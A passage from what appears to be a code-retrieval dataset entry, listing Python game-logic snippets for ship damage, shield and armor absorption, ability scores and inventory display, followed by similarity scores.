chance_of_system_damage():\n sensors_sys_damage = random_system_damage()\n \n if self.ship_class.max_torpedos and chance_of_system_damage():\n torpedo_sys_damage = random_system_damage()\n \n if chance_of_system_damage():\n warp_core_sys_damage = random_system_damage()\n \n if self.ship_class.cloak_strength and chance_of_system_damage():\n cloak_sys_damage = random_system_damage()\n \n if self.ship_class.max_crew and chance_of_system_damage():\n transporter_sys_damage = random_system_damage()\n \n if self.ship_class.polarized_hull and chance_of_system_damage():\n polarized_hull_damage = random_system_damage()\n \n if chance_of_system_damage():\n scanners_damage = random_system_damage()\n \n return (\n new_shields, new_hull, shields_dam, hull_dam, new_shields_as_a_percent, \n new_hull_as_a_percent, killed_outright, killed_in_sickbay, wounded, shield_sys_damage, \n impulse_sys_damage, warp_drive_sys_damage, sensors_sys_damage, \n warp_core_sys_damage, \n energy_weapons_sys_damage, cannon_sys_damage, \n torpedo_sys_damage, cloak_sys_damage, transporter_sys_damage, polarized_hull_damage, scanners_damage\n )", "def get_total_shield(self,obs):", "def choose_armor_throw(saving_throws):\n for i, value in enumerate(saving_throws, start=1):\n print('({}) {}'.format(i, value))\n b = _input('Choose armor penalty (-4):')\n\n return saving_throws[int(b)-1]", "def takeHit(self, amount, type, enemyShip):\n if type == 'energy':\n # go through shields in quadrant first\n if self.currentSP > 0:\n if self.currentSP >= amount:\n self.currentSP -= amount\n amount = 0\n else:\n amount -= self.currentSP\n self.currentSP = 0\n # go through armor next\n if self.currentAP > 0 and amount > 0:\n # set experience only if shot goes through shields\n if self.typeAP == 'energy':\n if self.currentAP >= (amount * globals.reflectiveArmorModifier):\n self.currentAP -= (amount * globals.reflectiveArmorModifier)\n amount = 0\n else:\n amount -= (self.currentAP/globals.reflectiveArmorModifier)\n self.currentAP = 0\n else:\n if self.currentAP >= amount:\n self.currentAP -= amount\n amount = 0\n else:\n amount -= self.currentAP\n self.currentAP = 0\n elif type == 'impact':\n # go through shields in quadrant first\n if self.currentSP > 0:\n if self.currentSP >= amount:\n self.currentSP -= amount/2\n amount = amount/2\n else:\n amount -= self.currentSP\n self.currentSP = 0\n \n # now goto armor\n if self.currentAP > 0 and amount > 0:\n if self.typeAP == 'impact':\n if self.currentAP >= (amount * globals.impactArmorModifier):\n self.currentAP -= (amount * globals.impactArmorModifier)\n amount = 0\n else:\n amount -= (self.currentAP/globals.impactArmorModifier)\n self.currentAP = 0\n else:\n if self.currentAP >= amount:\n self.currentAP -= amount\n amount = 0\n else:\n amount -= self.currentAP\n self.currentAP = 0\n \n # now that shields and armor are taken care of transfer remaining damage to internal components\n self.myParent.setExperience(amount, enemyShip)\n componentDamage = 0\n if amount > 0 and self.components != {}:\n while amount > 0:\n keyList = funcs.sortStringList(self.components.keys())\n componentDamage = 1\n for componentID in keyList:\n component = self.components[componentID]\n if component.currentHP > amount:\n component.currentHP -= amount\n amount = 0\n break\n elif component.currentHP > 0:\n # remove component\n amount -= component.currentHP\n del self.components[componentID]\n \n # check if all components destroyed, or damage absorbed\n if self.components == {} or amount == 0:\n break\n \n if componentDamage == 1:\n self.setMyStatus()\n self.myParent.setMyStatus()\n \n if amount > 0:\n if self.myParent.currentISP > amount:\n self.myParent.currentISP -= amount\n self.myParent.setMyStatus()\n amount = 0\n else:\n self.myParent.destroyMe()\n amount = 0\n \n self.myParent.updateAllGUIValues()", "def get_hp():\n\n return character['HP']", "def getAbilityScores(self):\n mods = [(self.str -10)/2,\n (self.dex-10)/2,\n (self.con-10)/2,\n (self.int-10)/2,\n (self.wis-10)/2,\n (self.cha-10)/2]\n print \"STR: {0} ({1}) \\nDEX: {2} ({3})\\nCON: {4} ({5})\".format(self.str,\n mods[0],\n self.dex,\n mods[1],\n self.con,\n mods[2])\n print \"INT: {0} ({1})\\nWIS: {2} ({3})\\nCHA: {4} ({5})\".format(self.int,\n mods[3],\n self.wis,\n mods[4],\n self.cha,\n mods[5])", "def info_equipment_silos_get():\n equipment = _equipment_by_group(404) # 404 == Silo\n return equipment, 200", "def print_inventory(self):\n\t\tfor item, amount in self.inventoryDictionary.items():\n\t\t\tprint (\"Item: \" + item.name + \" Quantity: \" + str(amount))\n\t\t\tprint (item.description + \"\\n\")\n\n\t\tprint(\"Currently equipped: \")\n\t\tprint(\"Main Hand: \" + self.equippedMainHand.name)\n\t\tprint(\"Armor: \" + self.equippedArmor.name)", "def get_main_hand_equipped(self):\n\t\treturn self.equippedMainHand", "def get_inventory():\n return INVENTORY", "def get_residue_info(self):\n return", "def setArmor(self, armor):\n self.av = armor" ]
[ "0.672655", "0.6709763", "0.6709763", "0.6694133", "0.5853349", "0.5786742", "0.5659746", "0.56013674", "0.5586368", "0.55516726", "0.54307085", "0.54023623", "0.52987903", "0.5295258", "0.52864414", "0.524963", "0.52466756", "0.5236324", "0.52125114", "0.5185202", "0.5182413", "0.5157946", "0.5107714", "0.50993043", "0.50896376", "0.50444233", "0.5043505", "0.50234234", "0.4996699", "0.49954265" ]
0.70991963
0